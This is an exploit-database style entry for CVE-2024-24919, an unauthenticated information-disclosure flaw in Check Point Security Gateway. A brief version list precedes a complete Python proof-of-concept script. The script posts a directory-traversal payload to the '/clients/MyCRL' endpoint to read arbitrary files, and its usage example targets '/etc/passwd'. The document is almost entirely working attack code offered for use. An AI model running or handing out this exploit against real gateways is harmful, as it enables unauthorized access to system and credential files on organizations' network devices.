Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.
advisories | CVE-2024-24919
# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
# CVE : CVE-2024-24919
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___
/ ____ / / ____| |__ / _ __ | || | |__ | || | / _ /_ |/ _
| | / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
| | / / | __|______/ /| | | |/ /|__ _|______/ /|__ ___, || |__, |
| |____ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / /
_____| / |______| |____|___/____| |_| |____| |_| /_/ |_| /_/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')
def exploit(url, path):
url = url + '/clients/MyCRL'
data = "aCSHELL/../../../../../../../../../../.."+ path
headers = {
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
}
s = Session()
req = Request('POST', url, data=data, headers=headers)
prepped = req.prepare()
#del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15
)
print(prepped.headers)
print(url)
print(resp.headers)
print(resp.status_code)
if __name__ == '__main__':
title()
if(len(sys.argv) < 3):
print('[+] USAGE: python3 %s https://<target_url> pathn'%(sys.argv[0]))
print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"n'%(sys.argv[0]))
exit(0)
else:
exploit(sys.argv[1],sys.argv[2])
